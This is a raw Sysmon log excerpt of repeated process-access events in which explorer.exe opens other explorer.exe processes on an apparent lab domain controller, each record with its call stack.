16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 